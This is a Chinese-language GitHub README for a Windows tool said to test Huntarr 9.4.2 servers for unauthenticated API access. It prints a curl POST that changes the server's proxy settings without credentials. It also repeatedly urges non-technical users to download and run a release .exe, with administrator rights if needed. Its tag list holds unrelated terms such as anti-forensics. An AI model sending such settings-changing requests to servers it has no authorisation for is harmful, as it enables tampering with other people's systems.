beel9711/huntarr-security-review

# 🔒 huntarr-security-review - 验证严重安全漏洞 [](https://github.com/beel9711/huntarr-security-review/releases) ## 🛠 关于 huntarr-security-review 此应用程序可帮助您检查您的 Huntarr 安装是否存在安全漏洞。它会测试未经身份验证的用户是否可以在不登录的情况下访问 Huntarr 的某些部分。如果发现任何问题，它会显示哪些部分是开放的并可能需要修改。 Huntarr 是一款流行的软件，用于管理 Sonarr、Radarr、Prowlarr 和 Lidarr 等媒体应用程序。遗憾的是，版本 9.4.2 存在严重的安全漏洞。该工具通过尝试对您的服务器执行简单的命令来证明这些漏洞的存在。您无需输入密码或 token。 如果您在网络中运行 Huntarr，此应用程序可帮助确认网络中的其他人是否可以在未经您许可的情况下访问密码或 API keys 等敏感信息。 如果您的服务器暴露在互联网上，这些风险将会增加。 请在攻击者之前使用此工具了解您 Huntarr 设置的安全状态。 ## 💾 下载 点击下方按钮访问发布页面，您可以在那里下载该应用程序的最新版本。 [](https://github.com/beel9711/huntarr-security-review/releases) ## 🖥 系统要求 - Windows 10 或更高版本 - 至少 100 MB 的可用磁盘空间 - 互联网访问权限，以下载应用程序并执行网络测试 - 运行软件和访问网络的基本用户权限 ## 🚀 入门指南：如何下载和运行 请仔细按照以下步骤在您的 Windows 计算机上运行该应用程序。 ### 步骤 1：访问下载页面 通过以下链接访问官方发布页面： https://github.com/beel9711/huntarr-security-review/releases 此页面列出了您可以下载的最新版本应用程序。 ### 步骤 2：下载最新的 Windows 文件 查找带有 `.exe` 扩展名的文件。它将被清楚地标记为 Windows 版本。 点击文件名将其下载到您的计算机。文件大小约为几兆字节。 ### 步骤 3：运行安装程序 下载完成后，在您的 Downloads 文件夹或浏览器保存文件的位置找到该 `.exe` 文件。 双击该文件以启动安装程序。 您可能会看到一个弹出窗口，询问运行程序的权限。点击 “Yes” 以允许。 ### 步骤 4：按照安装提示操作 安装程序将打开一个简单的设置窗口。 在每个屏幕上点击 “Next” 以继续安装步骤。 您可以接受应用程序的默认位置。 安装程序完成后，点击 “Finish” 关闭窗口。 ### 步骤 5：启动应用程序 安装后，您应该在桌面或开始菜单中看到一个名为 “Huntarr Security Review” 的新快捷方式。 双击以打开该程序。 ## 📋 使用 huntarr-security-review 此应用程序不需要技术技能或专业知识。 ### 步骤 1：输入您的 Huntarr 服务器地址 当应用程序打开时，您将看到一个输入 Huntarr 服务器地址的地方。 它看起来像这样： ``` http://your-huntarr:9705 ``` 将 `your-huntarr` 替换为运行 Huntarr 的 IP 地址或域名。 ### 步骤 2：开始安全测试 点击 “Start Test” 按钮。 该应用程序将向您的 Huntarr 服务器发送测试命令，并检查哪些部分在不登录的情况下做出响应。 ### 步骤 3：查看结果 该应用程序将显示一个列表，显示哪些 API 端点是开放的。 如果应用程序发现任何可以在没有凭据的情况下调用的端点，它将以红色突出显示它们以表示风险。 您还将看到有关如果存在这些漏洞攻击者可以做什么的信息。 ### 步骤 4：采取措施 如果测试显示漏洞，请着手保护您的 Huntarr 安装。这可能包括： - 限制对 Huntarr 的网络访问 - 将 Huntarr 或相关软件更新到安全版本 - 更改防火墙或路由器设置以阻止外部访问 - 如果您不使用 Requestarr 等功能，请将其禁用 ## 🔍 此应用程序如何工作 该工具运行一系列类似于下面的命令： ``` curl -X POST http://your-huntarr:9705/api/settings/general \ -H "Content-Type: application/json" \ -d '{"proxy_enabled": true}' ``` 它在没有任何登录或身份验证 token 的情况下发送这些命令。 如果服务器接受这些命令，则证明未经授权的用户可以访问您 Huntarr 安装中的敏感部分。 ## ⚙ 功能 - 除了下载和运行外无需其他设置 - 针对非技术用户的清晰用户界面 - 测试所有关键 Huntarr API 端点的公开访问权限 - 生成显示风险和警告的简单报告 - 在具有最低要求的 Windows 计算机上运行 ## 🔧 故障排除 - 如果应用程序无法运行，请确保您安装了 Windows 10 或更新版本。 - 检查您的互联网连接。该应用程序需要访问网络上的 Huntarr 服务器。 - 如果连接时遇到错误，请验证 Huntarr 是否正在运行以及您输入的地址是否正确。 - 如果 VPN 或代理服务干扰网络访问，请暂时禁用它们。 - 如果您看到权限错误，请以管理员身份运行该应用程序。 ## ❓ 常见问题 ### 我需要技术知识才能使用它吗？ 不需要。该应用程序会逐步指导您并显示清晰的结果。您只需输入您的 Huntarr 地址并按下一个按钮。 ### 我可以在 Windows 以外的系统上运行它吗？ 此版本仅在 Windows 上运行。未来版本可能会支持其他系统。 ### 如果我的 Huntarr 不是 9.4.2 版本怎么办？ 该工具专注于版本 9.4.2，但也可以检测相关版本上类似的身份验证绕过问题。 ### 我的测试显示漏洞。接下来怎么办？ 请咨询您的 IT 管理员或查看 Huntarr 官方文档以保护您的安装。阻止网络访问和更新您的软件是关键步骤。 ## 📥 再次下载 随时访问发布页面获取最新版本： https://github.com/beel9711/huntarr-security-review/releases 点击正确的 Windows `.exe` 文件进行下载并更新您的工具。 [](https://github.com/beel9711/huntarr-security-review/releases)

标签：API安全, CISA项目, Huntarr, JSON输出, Lidarr, Maven, POC验证, Prowlarr, Radarr, Sonarr, Windows工具, 反取证, 媒体服务器, 安全评估, 敏感数据泄露, 未授权访问, 消息认证码, 漏洞验证, 网络安全, 足迹分析, 身份验证绕过, 隐私保护